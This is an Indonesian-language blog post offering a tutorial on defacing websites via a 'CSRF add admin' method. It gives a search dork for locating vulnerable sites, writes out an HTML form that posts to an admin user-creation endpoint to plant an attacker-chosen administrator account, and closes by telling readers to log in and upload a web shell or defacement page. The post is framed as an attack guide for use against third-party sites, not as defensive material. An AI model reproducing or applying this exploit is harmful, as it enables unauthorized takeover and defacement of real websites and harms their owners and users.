DEFACE METODE CSRF ADD ADMIN [ NEWBIE CYBER SECURITY ]

Ditulis olehOFFICIAL NEWBIE CYBER SECURITYDiposkan padaTidak Dikategorikan

baik kali ini saya akan memberikan tutorial deface menggunakan metode CSRF – ADD ADMIN
bagi kalian yang belum tau apa si CSRF Itu Klik aja disini Touch Me

dari judulnya saja kita sudah mengetahui bahwa add admin itu menambahkan admin, loh bagaimana bisa kak kan kita belum masuk ke dashboardnya?

jadi metode ini menjelaskan bahwa kita hanya membutuhkan url dan token dari sebuah website itu dengan script yang saya kasi di bawah…..
langsung saja bagaimana cara melakukannya?….

Pertama

cara pertama kalian hanya perlu mempersiapkan Script + Dork + Shell / JSO
Exploit CSRF : Touch Me
Dork : inurl:/dream/album.php (kembangin lagi yoo)

Kedua ( Exploitasi / eksekusi ) 

Cara kedua –> setalah kalian dorking dengan dork di atas    Pilihlah web mana saja yang menurut anda vuln…. Oke disini saya meneukan web yang vuln… loh ko bisa tau kak kalau itu vuln? karna pas di tambahkan patch admin maka akan langsung menjukan halaman admin login… 

  bagaimana cara mengeksekusinya… coba kalian lihat di CSRF pada bagian
<form method=”post”  action=”https://{target kalian}/{path}/admin/usuario.php?action=incluir”>
     <input type=”hidden” name=”user_login” value=”aryakedek”>
     <input type=”hidden” name=”user_password” type=”hidden” value=”123456″ >
     <input type=”hidden” name=”user_email” value=”email@gmail.com”>
     <input type=”submit” value=”Tusbol”>

nah di bagian ACTION isi dengan web kalian –> ingat bagian /admin/usuario.php?action=incluir gausah di apa apain yang kalian ganti hanya  https://{target kalian}/{path}
paham??

pada bagian name=”user_login” value=”ini usernme anda buat nanti login admin” –> sama dengan  name=”user_password” type=”hidden” value=”ini password untuk login nanti”

email juga sama kaya di atas isinya…

oke kalau sudah masukan target ke CSRF –>
 
 disini terlihat 

username : gembel12
password : 123456

dan kita save CSRF nya.. dan buka di browser kalian masing masing

langsung aja klik Tusbol….

dan otomatis akan ke Redirect ke halaman login admin








nah disini kita sudah menyimpulkan bahwa username dan password kita sudah di tambah di server dia…
mari kita buka


yap bisa dilihat masuk ke dashboard menggunakan username dan password itu 🙂

kalian ke album dan JSO + Upload shell deh 🙂

sekian tutorial dari saya..
semoga bermanfaat assalamualaikum wr wb sampai jumpaa….

Diterbitkan oleh OFFICIAL NEWBIE CYBER SECURITY

BULDING CYBER SECURITY

Tinggalkan komentar

Rancang situs seperti ini dengan WordPress.com
Ayo mulai